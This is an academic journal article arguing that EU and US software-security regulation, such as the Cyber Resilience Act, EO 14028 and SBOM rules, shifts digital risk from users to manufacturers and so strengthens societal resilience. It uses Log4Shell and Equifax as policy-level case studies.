Next Article in Journal
A Shared Sorrow: Conceptualizing Mass Carceral Grief
Previous Article in Journal
From Screens to Schooling: Associations Between Adolescent Technology Use and Gendered College Enrollment
Previous Article in Special Issue
Service Difficulties, Internal Resolution Mechanisms, and the Needs of Social Services in Hungary—The Baseline of a Development Problem Map
 
 
Font Type:
Arial Georgia Verdana
Font Size:
Aa Aa Aa
Line Spacing:
Column Width:
Background:
Article

Cybersecurity Regulations and Software Resilience: Strengthening Awareness and Societal Stability

1
Department of Modern Technology and Cyber Security Law, Deák Ferenc Faculty of Law and Political Sciences, Széchenyi István University, 9026 Győr, Hungary
2
Cybersecurity Analytics and Operations, Penn State University, University Park, TX 16802, USA
3
Business Management and Marketing, Penn State University, University Park, TX 16802, USA
4
The Ministry of Education, Research, Development and Youth of the Slovak Republic, 851 01 Bratislava, Slovakia
5
Faculty of Management Science and Informatics, University of Žilina, 010 26 Žilina, Slovakia
*
Author to whom correspondence should be addressed.
Soc. Sci. 2025, 14(10), 578; https://doi.org/10.3390/socsci14100578
Submission received: 5 June 2025 / Revised: 1 August 2025 / Accepted: 25 September 2025 / Published: 26 September 2025
(This article belongs to the Special Issue Creating Resilient Societies in a Changing World)

Abstract

The societal effects of cybersecurity are widely discussed, but it remains less clear how software security regulations specifically contribute to building a resilient society, particularly in relation to Sustainable Development Goals 5 (Gender Equality), 10 (Reduced Inequalities), and 16 (Peace, Justice and Strong Institutions). This study investigates this connection by examining key EU and U.S. strategies through comparative legal analysis, software development (SDLC) case studies, and a normative–sociological lens. Our findings reveal that major regulations—such as the EU’s Cyber Resilience Act and the U.S. SBOM rules—are not merely reactive, but proactively embed resilience as a fundamental mode of operation. This approach structurally reallocates digital risks from users to manufacturers, reframing software security from a matter of compliance to one of social fairness and institutional trust. We conclude that integrating ‘resilience by design’ into technology rules is more than a technical fix; it is a mechanism that makes digital access fairer and better protects vulnerable populations, enabling technology and society to advance cohesively.

1. Introduction

A seemingly isolated disruption can ripple across sectors, destabilize institutions, disrupt essential services, and slowly erode the fabric of public trust that underpins modern society. The World Economic Forum’s (2023) Global Risks Report makes this point unmistakably clear: ransomware campaigns and software supply chain attacks are no longer confined to corporate networks. These attacks have now crossed over into public life, posing risks to economic stability, infrastructure and the very capacity of societies to absorb shocks while remaining functional. These incidents are not isolated anomalies; they represent a growing pattern. A pattern that increasingly blurs the line between cybersecurity and public resilience. When digital infrastructure fails, as seen in the 2016 Bangladesh Bank breach (Brewster 2016) and the 2021 Colonial Pipeline incident (Easterly and Fanning 2023), what breaks down is not merely a system—but public trust. When trust erodes, its consequences are rarely confined to institutional dysfunction, and in some cases, the rupture rises to the level of national security.
In this context, cyber resilience can no longer be reduced solely to technical posture. While traditional cybersecurity primarily focuses on preventing intrusions (defense), resilience encompasses the broader capacity to withstand, adapt to, and recover from disruptions, ensuring continued core functionality even when defenses are breached. It is becoming increasingly understood as the technological extension of a broader societal capacity—one that depends not only on resistance, but also on the ability to recover, adapt, and reorganize. Today, resilience is no longer isolated to the systems that satisfy status quo. What we mean—and what we increasingly have to mean—is something deeper. Resilience now possesses the ability to move with the disruption, absorb it, learn from it, and keep going. This is why concepts like “resilience by design” or “zero trust” have begun to appear not only in engineering manuals, but adjacent in policy papers (Van Bossuyt et al. 2023) as well. They have crossed over. They are now part of how we think about trust—about how institutions endure, how people stay included, and how legitimacy is built when systems are tested. It is no longer just about fending off attacks anymore. It is now about preventing the core structure of public life from unravelling in real time. Microsoft highlights Zero Trust as a foundational security strategy suited to the demands of the modern digital environment. The global shift to remote and later hybrid work models during the COVID-19 pandemic accelerated the need for such an approach, as organizations faced a significant rise in the volume and sophistication of cyberattacks. The Zero Trust model emphasizes continuous authentication and authorization of access requests, taking into account user identity, location, and device health. Unlike traditional perimeter-based defenses, the Zero Trust approach operates under the assumption that a breach may already exist within the internal network. As a result, every request is treated as though it originates from an untrusted source—regardless of location or requested resource. Each access attempt must be explicitly verified, authorized, and encrypted, ensuring stricter control over system interactions (Microsoft 2022).
Within this shifting terrain, the meaning of resilience itself is changing. It is not just a score on a readiness index but a normative structure; a way of organizing technical, legal, and social decisions so that digital infrastructures do not just work, but holds together under pressure. This shift is perhaps most evident in how we have come to view software security, not just as a coding problem, but as a political and social problem. The most damaging attacks are not always the loudest. They are attacks that slip through cracks we have left open, unpatched systems, unclear ownership, and unmonitored update chains. While new technologies like Security Orchestration Automation and Response (SOAR) or AI-driven detection are changing the game, they do not work in a vacuum. Without legal clarity and norms to anchor them, even the best systems fall short. Resilience extends beyond mere code; it requires structure and trust.
To fully grasp this expanded understanding, it is essential to consider the broader concept of societal resilience and how it intersects with the evolving cybersecurity landscape. Societal resilience, in this context, refers to the capacity through which individuals, micro- or macro-level communities, or society as a whole are able to respond effectively to disruptions of ordinary processes (Cañizares et al. 2021). The relationship between cybersecurity and societal resilience is particularly close, therefore it is worth examining the academic literature from a policy perspective. This convergence between these two fields has already been highlighted in the European Union’s 2013 Cybersecurity Strategy (European Commission 2013), which emphasized the need to strengthen individual cybersecurity awareness, and among other measures, introduced the European Cybersecurity Month. North Atlantic Treaty Organization (NATO), for its part, recognized cyberspace as a domain equivalent to traditional theatres of war; initially focused on building the resilience of its personnel. It is important to note the significant overlap in membership between these two organizations, with the majority of EU member states also being NATO allies, which often fosters complementary policy approaches in security matters. However, in the wake of the hybrid war in Ukraine, and the growing number of cyberattacks from China, Russia, and North Korea, the 2018 Brussels Summit Declaration went further, committing to developing a comprehensive, multi-layered form of cyber resilience that encompasses society as a whole (North Atlantic Council 2018).
In the following decade, documents from both of these organizations have consistently emphasized the importance of societal adaptability to the cyber domain as a core element of resilience. The EU’s 2017 and 2020 Cybersecurity Strategies describe cyberattacks as national security threats, and underlines that strengthening societal resilience in this area is among the key conditions of an effective response. The urgency of this need was only intensified by the COVID-19 pandemic and the subsequent outbreak of war in Ukraine (Kuzior et al. 2024; Farkas and Vikman 2024; Kelemen 2023). In NATO’s 2021 declaration, the Strengthened Resilience Commitment, described national and collective resilience as guarantees of credible deterrence. Within the NATO 2030 framework, improving societal resilience, specifically in the area of cybersecurity, was set as a priority; a goal further reinforced in the 2022 NATO Strategic Concept, which ties this to the imperative of maintaining technological superiority.
Academic discourse has begun to explore the nexus between cybersecurity and societal resilience. Building on the early work of Arturo Escobar (1994) and other Science and Technology Studies (STS) scholars (e.g., Latour 1987), it has been widely argued that technology is not separate from the social world but is shaped by it and, in turn, influences it. In his view, the kinds of tensions we see in physical space also appear in cyberspace, which means resilience strategies need to account for these dynamics as well (Escobar 1994). This perspective later gave rise to the idea of socio-technical vulnerability, which holds that cybersecurity and cyber resilience are influenced not just by technical factors, but also by individuals’ lived experiences and the values embedded in society. Accordingly, cybersecurity should be understood as a combination of social plus technology, rather than a purely technical problem involving human operators (Cavelty et al. 2023).
A particularly relevant approach in this context is that of resilience by design, an idea of embedding resilience into system design that is gaining traction. This principle is complementary to, but distinct from, the more established concept of security by design. While security by design focuses on proactively building defenses to prevent breaches (‘baking security in’), resilience by design assumes that failures or breaches will inevitably occur and aims to ensure that the system can withstand, adapt to, and quickly recover from them (Colabianchi et al. 2021). In practice, this means designing cyber infrastructures that are not only technically robust but also attuned to the social environment. By embedding resilience from the outset, rather than treating it as an add-on, these systems are better equipped to remain functional under unpredictable and hostile conditions. This forward-looking approach is crucial in today’s vulnerable and ever-evolving digital ecosystems (Colabianchi et al. 2021).
Recent contributions also emphasize the need for a better understanding of cyber threats at the individual level, as this awareness often serves as the first step against preventing systemic failures. Several authors have argued that the increasing complexity of cyber threats requires more than ad hoc responses. A structured, multi-level preparedness model has therefore been proposed, enabling institutions to respond to evolving risks in a more deliberate and adaptive manner (Saeed et al. 2023). In parallel, national cybersecurity defensive measures are being recognized not only as technical frameworks, but also as critical policy instruments that shape awareness and contribute directly to strengthening social resilience (Aldaajeh et al. 2022). Another reoccurring theme is the demand for the development of advanced digital skills to effectively mitigate cyber threats (Kelemen et al. 2024). Educational initiatives that aim to foster these competences are therefore of vital importance to the qualitative improvement of societal resilience (Maurer and Fritzsche 2023).
The socio-technical model and the resilience-by-design principle are also crucial in the field of software development (Colabianchi et al. 2021). Embedding cybersecurity into development workflows is no longer optional; it has become a core element of responsible digital design. This shift is further evident in how agile methodologies are utilized with continuous iteration and testing, while secure design principles are embedded across the full software development lifecycle. When combined with the implementation of resilient interfaces, such as multi-factor authentication, the result is a significant step toward building digital tools that are both secure and sustainable (Tashtoush et al. 2022; Andrade et al. 2023; Von Solms and Futcher 2020). At the same time, however, the human factor remains equally important, both in terms of responsible software development and conscious use. On the developer side, this involves intentionally incorporating cybersecurity requirements into programming, while on the user side, it includes making informed decisions about software and regularly updating systems (Gasiba et al. 2020; Xiao and Spanjol 2021; Sun et al. 2024). Together, these factors enhance both cybersecurity and societal resilience in qualitative terms.
The literature also highlights that societal resilience, cybersecurity, and software development have implications for achieving the Sustainable Development Goals (SDGs). These connections may be direct or indirect: cybersecurity is now essential in the context of SDG 4C (quality education), SDG 9 (industry, innovation and infrastructure), and SDG 9C (access to digital technologies); all of which are prerequisites for improving cyber resilience. Additionally, the strengthening of cybersecurity resilience may also contribute to SDG 16, which aims to promote peaceful, just, and inclusive societies. The addition of more robust defense mechanisms can reduce the effectiveness of cyberattacks, thereby helping to diminish both cybercrime and organized criminal activity (Dede et al. 2024; Aziz et al. 2025; Popkova et al. 2022).
From the above, it is evident that both NATO and the European Union prioritize cybersecurity, and at present, recognize it as a core pillar of societal resilience. The literature largely agrees that cybersecurity should not be reduced to a technical issue alone. Its social aspects are equally critical, often shaping the very conditions under which resilience can emerge. This recognition also brings certain responsibilities at the level of public policy. Efforts to increase awareness, rethink education, and support secure development and use of software are not peripheral; they form the foundation of any serious attempt to build societal resilience. Indeed, these efforts are closely aligned with the broader objectives of the SDGs. However, while the societal significance of cybersecurity and its connection to resilience are increasingly recognized, the specific structural role of regulation in actively shaping this resilience often remains a less explored dimension. This study, therefore, stems from a simple premise: we cannot understand societal resilience without examining how cybersecurity regulation is structured. It is not enough to ask what technical safeguards exist; we must also examine how they are framed in law, how they allocate responsibility, and how they contribute to broader policy goals, particularly the Sustainable Development Goals (SDGs 5, 10, and 16). Consequently, the central question of this paper is: do the cybersecurity regulations safeguarding the EU and the US, specifically those dealing with software, merely react to threats, or can they offer structural responses to the vulnerabilities of the digital society they serve to protect? Can they do more than defend; can they build?

2. Materials and Methods

This study explores how cybersecurity regulation shapes the social architecture of resilience. To achieve this, it adopts an interdisciplinary approach, weaving together interpretive legal theory, public policy analysis, and an operational understanding of cybersecurity. The guiding research question is as follows: how do EU and US cybersecurity regulations, particularly those addressing software security, embed and operationalize the concept of societal resilience?
To address this question, the study proceeds along four interrelated analytical strands, each employing specific methodological tools. The overall research process is illustrated in Figure 1. The aim is not to measure resilience quantitatively but to offer an interpretive exploration of how legal and policy frameworks embed normative expectations around societal resilience, focusing on its transformative potential for democratic participation, digital equity, and institutional trust.

2.1. Discourse Analysis of Strategic Policy Documents

The first analytical strand involves a critical qualitative discourse analysis of three strategic documents: the European Union’s 2020 Cybersecurity Strategy, the 2025 Internal Security Strategy (ProtectEU), and the United States’ National Cybersecurity Strategy (2023). These documents were selected for their pivotal role in shaping post-2020 cybersecurity governance in response to hybrid threats and infrastructure-level digital risks. The analysis employed thematic coding, focusing on how key terms such as “resilience,” “security by design,” and “public trust” are deployed. While our focus on “resilience” was driven by the central research question, the concepts of “security by design” and “public trust” emerged as dominant themes during our initial review of the policy documents. We selected this cluster of terms for analysis because they represent the key conceptual points where the discourse shifts from a purely technical to a socio-political understanding of cybersecurity. The analysis then examined their semantic frequency, their positioning within institutional, civic, and technological framings, and their explicit or implicit connections to the Sustainable Development Goals (SDGs 5, 10, and 16). The aim was to understand how these discourses construct societal resilience and align it with regulatory priorities.

2.2. Comparative Legal Analysis of Regulatory Texts

The second strand applies a comparative legal analysis to selected regulatory texts from both the European Union (EU Cyberseurity Act, EU Cyber Resilience Act) and the United States Executive Order 14028 (2021), the 2023 U.S. National Cybersecurity Strategy (2023), FISMA, and provisions related to Software Bill of Materials [SBOM] implementation). The comparative analysis focused on how the concept of resilience is embedded within these frameworks by examining: (a) the social mechanisms mobilized; (b) the distribution of responsibility among developers, vendors, and users; and (c) the underlying regulatory logics governing technical risk. Special attention was paid to whether software security is addressed as a socio-economic issue, if responsibility extends to producers, if transparency towards users is mandated, and if these instruments promote equitable access to digital safety. The selection criteria for these legal instruments were their landmark status and direct relevance to software security governance and its societal implications on both sides of the Atlantic. The findings of this comparative analysis are synthesized in a dedicated overview in Section 4.4, providing a direct comparison of the regulatory approaches. It is important to specify that our approach is not one of doctrinal legal analysis but rather an interpretive socio-legal one. We treat these regulatory texts as authoritative policy documents, examining the ways in which they frame problems, allocate responsibility, and embed normative goals. This methodological choice is grounded in the socio-legal tradition, which posits that legal frameworks cannot be understood in isolation from their societal context. As the legal philosopher Vilmos Peschka argued, the existence, function, and impact of law are determined by its ‘incessant connection with the other partial complexes’ of the social totality (Peschka 1988). Consequently, our analysis focuses on these connections, including the normative goals expressed in non-binding but interpretively crucial sections such as the recitals, to understand the law’s intended and potential societal impact.

2.3. Case Study Analysis of Software Vulnerabilities

The third analytical strand examines the issue from the perspective of information security and software engineering, focusing on resilience-conscious design and governance within the Software Development Life Cycle (SDLC). This section employs a qualitative case study methodology, analyzing the Log4Shell vulnerability and the 2017 Equifax data breach. These cases were selected because they clearly demonstrate how technical software vulnerabilities can cascade into wider institutional and societal trust failures, with extensive publicly available evidence (incident reports, technical analyses, policy responses) enabling a detailed examination. The SDLC’s core stages—including requirements analysis, design, implementation, testing, deployment, and maintenance—are examined here as critical junctures where vulnerability management practices directly shape resilience outcomes. The analysis focuses on how failures that embed secure development practices and coordinated patch management at these stages amplified risks across technical, institutional, and societal layers. This perspective reframes the SDLC not merely as an engineering workflow but as a normative arena in which resilience is actively built and maintained.

2.4. Normative–Sociological Interpretation

The fourth strand develops a normative–sociological interpretation of societal resilience, grounded in the conceptual frameworks of the “social–technological model” and “resilience by design.” This analysis employs interpretive methods, drawing on institutional hermeneutics and critical discourse analysis as applied to the previously examined strategic, legal, and case study materials. Its aim is to demonstrate that resilience is an active capacity rooted in citizen engagement with the design, governance, and institutional framing of digital infrastructures. The analysis focuses on how regulatory expectations, institutional architectures, and cultural norms interact to shape the lived experience of digital participation and how resilience emerges as a socially configured practice.

3. Results

To understand how cybersecurity regulations can effectively embed and operationalize societal resilience, it is first necessary to establish the foundational findings related to the software security landscape. This section, therefore, presents the results concerning the characteristics of prevalent software models, the systemic impact of major security breaches, and the critical junctures within the Software Development Lifecycle (SDLC) where resilience is either compromised or cultivated.

3.1. Proprietary vs. Open-Source Software: Contrasting Security Implications and Resilience Profiles

The advancement of information and communication technologies is not simply reshaping daily life; it is reprogramming its logic. What appears as innovation on the surface carries, almost by necessity, a deepening exposure beneath it. Cyberattacks are no longer erratic but systematic, tracking the same arc as the infrastructures they target. This analysis reveals that security, in this light, is no longer a technical supplement; it is a structural precondition for resilience. A core component of this challenge lies in software security, where findings align with the perspective that cybersecurity is inherently a socio-technical problem (Cavelty et al. 2023). Consequently, a key distinction in source code accessibility—between closed (proprietary) and open-source (OSS) models—emerges as a critical factor, as each model entails differing development philosophies, security implications, risk profiles, and technical and societal dimensions.
Source code refers to a sequence of instructions written in a format humans can read and work with, which is later compiled into an executable application. In proprietary systems, this code remains under the control of the developer, with user access tightly regulated through licensing agreements. Analysis of this model indicates that security responsibility is placed almost entirely with the vendor (e.g., Microsoft, Apple), who may invest substantial resources in internal protocols, embedded protections, and regular updates. While the restricted nature of the codebase can offer protection against direct exploitation, it also presents challenges such as limited transparency and vendor dependency that may, in itself, weaken resilience (Guo et al. 2022).
Understanding the socio-technical nature of cybersecurity must also be grounded in core principles that inform secure software design. Cybersecurity is not solely a technical challenge—it is deeply intertwined with human behavior, organizational processes, and societal structures. This socio-technical dimension recognizes that even the most advanced security technologies can fail if people misuse them, ignore protocols, or if organizations do not support a security-conscious culture.
A basic prerequisite for developing security-aware applications is a solid understanding of fundamental concepts in the field, which helps developers recognize threats, implement controls, and grasp the broader purpose of the software beyond its functionality (Janca 2021). One such foundational framework is the CIA triad—confidentiality, integrity, and availability—which remains central to organizational information security strategies (Chai 2022).
Confidentiality refers to protecting sensitive data from unauthorized access. Based on the potential impact of exposure, data is categorized, and safeguards are applied accordingly. Two-factor authentication is a common measure that helps enforce confidentiality by requiring additional identity verification during login attempts.
Integrity emphasizes the reliability, consistency, and trustworthiness of data across its lifecycle. This involves preventing unauthorized modifications, whether during transmission or due to internal breaches. For example, users can monitor banking transactions and report inconsistencies if unauthorized changes are suspected.
Availability ensures that systems and data are reliably accessible to authorized users. It also involves maintaining the technical infrastructure needed to deliver uninterrupted service and protect against downtime or system failure (Chai 2022).
These core principles are not only theoretical but directly influence development choices, particularly in the implementation of security mechanisms across both open-source and proprietary software environments.
Open-source models (Hadi et al. 2024), conversely, operate with publicly accessible source code by design. Projects such as Linux or Apache are maintained entirely in the open, often on platforms like GitHub, where developers can inspect, suggest, and modify the code collaboratively. This community-based model, in theory, supports faster identification of vulnerabilities through the “many eyes” principle. However, examination of this model also reveals inherent risks: public access to the code allows malicious actors the same visibility as legitimate contributors; quality control and security audits are not consistently applied; project support is contingent on time, trust, or the availability of contributors; and documentation and update frequency can vary significantly (Shan et al. 2022). The premise that public scrutiny accelerates error detection is tempered by the reality that openness, while beneficial for community collaboration, does not inherently equate to security, as it can equally aid attackers.
The key takeaway from this subsection is that proprietary and open-source models operate on different assumptions regarding responsibility for security. While the control and closed nature of the proprietary model allow for a clearer allocation of liability to the manufacturer, the decentralized nature of the open-source ecosystem results in a more complex web of responsibilities. This distinction is highly significant for the regulatory interventions that follow. As we will detail in Section 4, the regulatory frameworks in both the EU and the US can be understood as normative interventions aimed at recalibrating these responsibility structures, primarily by strengthening the obligations on the side of the producer.

3.2. Lessons from Critical Vulnerabilities: The Cases of Log4Shell and Equifax

The Log4Shell vulnerability, a critical security flaw in the Apache Log4j logging library, serves as a key finding, demonstrating that even a seemingly minor flaw in a widely used open-source component can trigger cascading impacts capable of destabilizing entire systems and institutional structures. The incident analysis highlights that this was not simply a lapse in technical oversight but a wider systemic warning: digital trust is not sustained by scattered ad hoc patches. It depends on the regularity, coordination, and shared accountability of maintenance practices, integrated not as a technical afterthought but as a structural principle. The clear conclusion drawn from this case is that software maintenance cannot be an ad hoc undertaking; it must be built on a deliberate and coordinated strategy where review and maintenance are treated not just as technical obligations but as social contracts (Pigola and De Souza Meirelles 2024).
Further findings on effective software security practices indicate that identifying weaknesses is not a matter of picking the “right” tool but a matter of approach. Code review, whether manual or automated, is about more than bug hunting; it ensures fragile parts do not go unnoticed. Network sniffing, a non-interventional method, traces information flow, catching unintended exposures. Penetration testing actively replicates attack scenarios to uncover exploitable gaps. These methods, while effective individually, are found to be substantially more powerful when embedded throughout the entire Software Development Life Cycle (SDLC), from design to maintenance, thereby supporting a proactive mindset where resilience is a structural principle (Wang et al. 2023).
The 2017 Equifax data breach provides another critical illustration. The case demonstrates that effectively managing software security requires a security-conscious approach to the SDLC that also considers the broader socio-technical context. Optimal protection and resilience can only be achieved if security requirements and controls (security by design and “resilience by design”) are consistently integrated from inception to decommissioning (Colabianchi et al. 2021). The Equifax incident underscores the consequences of failing to integrate security from the outset: accepting indefensible risks, eroding trust, and societal spillover. This case specifically highlights the critical importance of proactive vulnerability and patch management, even in later SDLC phases, not merely as a technical responsibility but as a fundamental element of system-level and societal resilience, as evidenced by persistent organizational shortcomings preventing timely patch implementation despite its availability (Boss et al. 2024).

3.3. Integrating Security and Resilience Across the Software Development Lifecycle (SDLC)

The Software Development Life Cycle (SDLC) represents a systematic framework through which software systems are conceived, built, tested, deployed, and maintained (Khan et al. 2022). Unlike a product life cycle, which addresses market-driven phases such as introduction, growth, maturity, and decline, the SDLC focuses exclusively on the technical and procedural stages that ensure a system’s functional and secure development throughout its operational life. In this structured model, integrating security and resilience requirements into every phase is essential for minimizing socio-technical vulnerabilities and sustaining trust over time. As described by Khan et al. (2022), the SDLC generally involves the following interrelated stages:
  • Requirements Analysis: This phase identifies functional and non-functional requirements, including clear security specifications and initial threat modelling to anticipate technical and user-based risks.
  • Design: System architecture and design patterns are developed with explicit security and resilience considerations, embedding “security by design” from the outset.
  • Implementation: Source code is produced following secure coding standards, accompanied by code reviews and version control practices to detect vulnerabilities early.
  • Testing: Multiple levels of testing—including static and dynamic code analysis, penetration testing, and validation checks—are conducted to verify the integrity and robustness of the system.
  • Deployment: Secure deployment practices ensure that the system is configured correctly, that access controls are enforced, and that protective measures are active at launch.
  • Maintenance: This stage emphasizes continuous monitoring, timely patch management, and regular updates to counter emerging threats. It also requires active collaboration between developers and users to maintain system resilience in dynamic socio-technical environments.
A critical insight here is that, in line with Khan et al. (2022), cybersecurity must be embedded as an ongoing, integrated process condition. Threats such as malware, phishing, distributed denial-of-service (DDoS) attacks, or zero-day exploits demonstrate that resilience cannot be treated as an isolated technical safeguard but must be sustained through continuous practice across the entire SDLC. To be precise, the SDLC framework itself is not inherently resilience-conscious. It becomes so only when ‘resilience-by-design’ principles are deliberately integrated into each phase, transforming the lifecycle from a neutral development process into an active governance framework for managing socio-technical risk.

3.4. The Role of Standards and Modern Development Practices in Operationalizing Resilience

Structured and secure development processes are underpinned by international standards such as ISO (2022), offering a broader framework for governing information security (Kang and Kim 2022). In parallel, modern development practices like DevOps and DevSecOps seek to embed security and resilience into every layer of the development lifecycle. These agile and recursive approaches, grounded in interrogative testing and feedback as a condition for movement, point towards a continuous negotiation with disruption rather than a static endpoint (Alghawli and Radivilova 2024). It is here that the analysis shows “resilience by design” becoming more than theory—a working logic under pressure, as suggested by Colabianchi et al. (2021). These practices operationalize “security by design” through automated controls and foster a security-conscious development culture recognizing socio-technical vulnerabilities as inherent features.
A concluding finding from this section is that neither the proprietary nor the open-source model offers a standalone guarantee of cybersecurity, each possessing structural strengths and inherent limitations. What matters is not the model itself, but the discipline with which risks are managed across the software lifecycle through testing, auditing, lifecycle-integrated controls, adherence to standards, timely patch management, and development methods treating security as a continuous concern.

4. Discussion

4.1. The U.S. Regulatory Approach: From Compliance to Shared Responsibility in Shaping Digital Resilience

Long before the 2023 cybersecurity strategy appeared in print, its outlined principles were already present in earlier laws, executive orders, and the silent adjustments of federal practice. Regulatory efforts were already in motion, quietly but deliberately redrawing the lines around critical infrastructure and its increasingly fragile digital underpinnings. In the U.S. context, software security had begun to outgrow its technical framing. It was becoming something else entirely: a structural condition for economic continuity, and more subtly, for public trust.
Federal procurement was suddenly contingent on the integration of security-by-design features. In practice, this had an especially strong impact on the healthcare sector, where devices like patient monitors, ventilators, and medical sensors are now subject to a higher bar of trust and protection. Earlier groundwork had already been laid by the Federal Information Security Modernization Act (FISMA) (2014), which called on federal agencies and their contractors to develop robust cybersecurity frameworks with guidance from the National Institute of Standards and Technology (NIST). At first, it appeared to be a technical issue, a security concern or vulnerability for IT teams to patch, monitor, or log for later. However, over time the scale changed, as what was once buried in backend protocols began appearing in front-page headlines. Gradually, it shifted from being about technology to being about strategy.
The turning point came in May 2021 with the introduction of Executive Order (EO) 14028. Triggered by a high-profile supply chain attack, the executive order sent a clear message: the system had too many blind spots. EO 14028 not only set out to tighten procurement rules, but it called their bluff. Who wrote the software? Who signed off on it? Who updates it? Who disappears when the software fails? Traceability was no longer just a best practice anymore; it became a government contractual precondition. More importantly, it acknowledged something that had been long avoided: that the state cannot secure its digital ecosystem without private sector alignment. From this point forward security had moved beyond being a siloed duty, it had become a shared architecture between the government and private party vendors. The order recommended that trust in the digital infrastructure must now be both shared and demonstrable.
One tangible result of EO 14028 was the launch of a cybersecurity labelling program aimed at helping consumers make informed decisions about the software and IoT devices they purchase. Modeled after appliance energy labels, the idea was simple: before buying a device, users should know how long it will be supported, how often it will be updated, and whether or not it meets essential security criteria. These labels were designed to be visible, understandable, and accessible, both physically and digitally (U.S. Cybersecurity and Infrastructure Security Agency (CISA) 2024).
This regulatory framework was later reinforced by a 2021 National Security Memorandum on the cybersecurity of industrial control systems managing critical infrastructure. This was the moment where the state openly conceded what had long been implicit: that it no longer holds the monopoly on securing the nation’s most vital systems. From energy grids to water networks to public transport, the risks had crossed over from speculative scenarios into tangible, measurable vulnerabilities. The distinction between public authority and private obligation began to blur—permanently.
As emphasized in recent scholarship (e.g., Aldaajeh et al. 2022), national strategies and regulatory frameworks are no longer peripheral elements in the formation of cybersecurity awareness and community resilience; they are central drivers. Examining the regulatory and strategic environment of software security has become essential when addressing the national security significance of cyberspace. This fundamental shift in emphasis, first introduced by the 2023 National Cybersecurity Strategy, from the Trump-era “forward defense” toward a cooperation-oriented model, highlights the underlying tensions between technological advancement and institutional governance. The starting point, the Cybersecurity Framework, offers a voluntary and scalable approach for critical infrastructure and government actors, placing particular emphasis on software design, development, and supply chain security. A defining feature of the framework is its reliance not on administrative mandates, but on best practices, such as secure-by-design development. The strategy as a whole is built around five key pillars, which serve not only as the vertical scaffolding for task allocation, but also as the space where accountability relationships are made explicit. One of the prerequisites for a functioning digital ecosystem is a regulatory framework capable of addressing the risks that come with innovation without stifling it. This delicate balance is precisely what recent U.S. approaches have increasingly and consciously sought to achieve.
The third pillar of the U.S. cybersecurity strategy signals a structural shift: digital risks are no longer seen as individual responsibility, but as obligations that must be borne by those with systemic impact, primarily software vendors and major data operators. In the tech industry, this introduces an unfamiliar dynamic. It is no longer just about adopting better practices, it is now essential to acknowledge that insecure defaults, opaque systems, and deferred updates are not technical lapses, but public risks. The strategy does not stop at technical prescriptions. Although it calls for secure-by-design development and tighter scrutiny of third-party components, the real move is elsewhere. It shifts the weight of failure, quietly but firmly, onto those who design the systems in the first place, not the users and not the victims. The market is where accountability belongs, and the strategy says as much, even if not explicitly.
This fundamental repositioning of accountability is not merely a policy choice; it reflects a growing consensus in the academic and policy communities. Scholars widely argue that increasing vendor liability is a necessary market incentive to drive better security practices, compelling producers to prioritize cybersecurity from the design phase onward (Bellovin 2023). While there are acknowledged challenges, such as defining the precise boundaries of negligence and avoiding the stifling of innovation (Nash 2021; Bellovin 2023), the underlying principle remains: the actors best positioned to mitigate security risks—the vendors—should bear a greater share of the responsibility. Our analysis aligns with this view, focusing on how this liability shift serves as a key mechanism for building societal resilience.
In terms of resilience, this shift is crucial. The erosion of trust in digital systems often stems not from a single catastrophic failure, but from the quiet normalization of unmanaged risks passed down to end-users. Community strength in the digital age, therefore, begins with limiting this exposure at its source. Here, transparency tools like the Software Bill of Materials (SBOM) (U.S. National Telecommunications and Information Administration (NTIA) 2021) become more than a technical requirement; they are a precondition for civic trust. As scholars like Carmody et al. (2021) argue in the context of healthcare, the transparency provided by an SBOM is a foundational element for building resilient supply chains. By enabling rapid identification of vulnerabilities in critical medical devices, SBOMs contribute directly to patient safety and the overall resilience of the healthcare system, reinforcing institutional trust. This logic extends beyond healthcare: mandating such transparency across sectors enables proactive risk management, which is a direct, tangible contribution to societal resilience.
The regulatory logic outlined above not only reframes how markets operate it also serves, indirectly but intentionally, as a tool for advancing the Sustainable Development Goals (SDGs). Cybersecurity labeling, for instance, promotes informed technology choices and helps foster digital literacy among users, which ties directly into the goal of quality education (SDG 4.4 and 4C). The transparency of updating cycles and long-term vendor support, along with baseline requirements for suppliers, contribute to the reliability of digital infrastructure. They further encourage innovation in the security domain and help drive support objectives in industry, innovation, and resilient infrastructure (SDG 9 and 9C). Strengthened supplier accountability and regulatory feedback mechanisms for example, consequences for non-compliance with risk mitigation protocols, can also help reduce systemic vulnerability and cybercrime. In this sense, they align with the broader goal of promoting peaceful, just, and inclusive societies (SDG 16.1 and 16.6). These regulatory interventions are thus not only technical in nature, but they also carry social and political weight. A secure digital ecosystem is not an end in itself, but a means toward long-term goal of societal sustainability.
It is equally important to recognize that the impact of legal instruments is not uniform across social groups or institutional environments. A metropolitan hospital’s cybersecurity infrastructure and protocols bear little resemblance to the informal practices of a rural school or the limited IT resources of a municipal water utility. In each case, the demand for digital security carries a different weight. Where in-house development teams exist, compliance with federal requirements may be a matter of internal alignment; where a lone IT administrator manages a fragmented system, the same regulation can become a structural burden. Even seemingly neutral mandates, such as updating obligations or SBOM integration, impose asymmetrical costs depending on institutional scale, capacity, and access to expertise. These differences directly affect how resilience can be realized in practice.
Hence, the true center of gravity for building social resilience lies not in centralized distribution, but in decentralized adaptability. Schools, hospitals, local governments, civil hubs can only respond effectively to cyber threats when their tools, skills, and regulatory templates are allowed to connect organically. In such settings, security is not a static condition, but a mode of operation defined by trust relations, accessibility, and the internal balance of adaptation. A regulation that demands rigid, one-size-fits-all compliance risks reinforcing vulnerability rather than alleviating it. Resilience does not unfold from central blueprints but takes shape in places where the rules can bend just enough to fit the people. If regulation does not leave room for difference, it will not hold where support is thin, leading to failure where it is needed most.
From this perspective, the third pillar of the U.S. cybersecurity strategy, centered on the redistribution of responsibility, can be seen as a practical enactment of the resilience-by-design principle. Requirements for secure software development, mandatory SBOM use, and greater supply chain transparency are not defensive measures added post hoc; they are built into the architecture from the design stage onward. In this framework, protection is not layered on from the outside; it is embedded in how the system is supposed to work a priori. The logic here follows what the socio-technical model has long suggested: security is not just about shielding the technical layer. It is about building environments where the technical, the human, and the institutional are designed to support one another. That shift matters. It is what allows someone without advanced digital skills to still interact with a system safely, and that is not a small consideration. It is where regulation begins to touch everyday experience and where the digital divide, however persistent, becomes just a bit less steep. Security and social adaptability are not separate ambitions; they are part and parcel of the same operational architecture.
What emerges here is not a technocratic strategy, but a redistributive one with risk returning to where power resides. The logic that the relocation of digital burdens from vulnerable users to dominant producers is what ties cybersecurity policy to broader questions of societal resilience. Not every country has the leverage to do this; however, for the countries that possess the ability to do so, the message is clear: resilience is not stoicism. It is design.

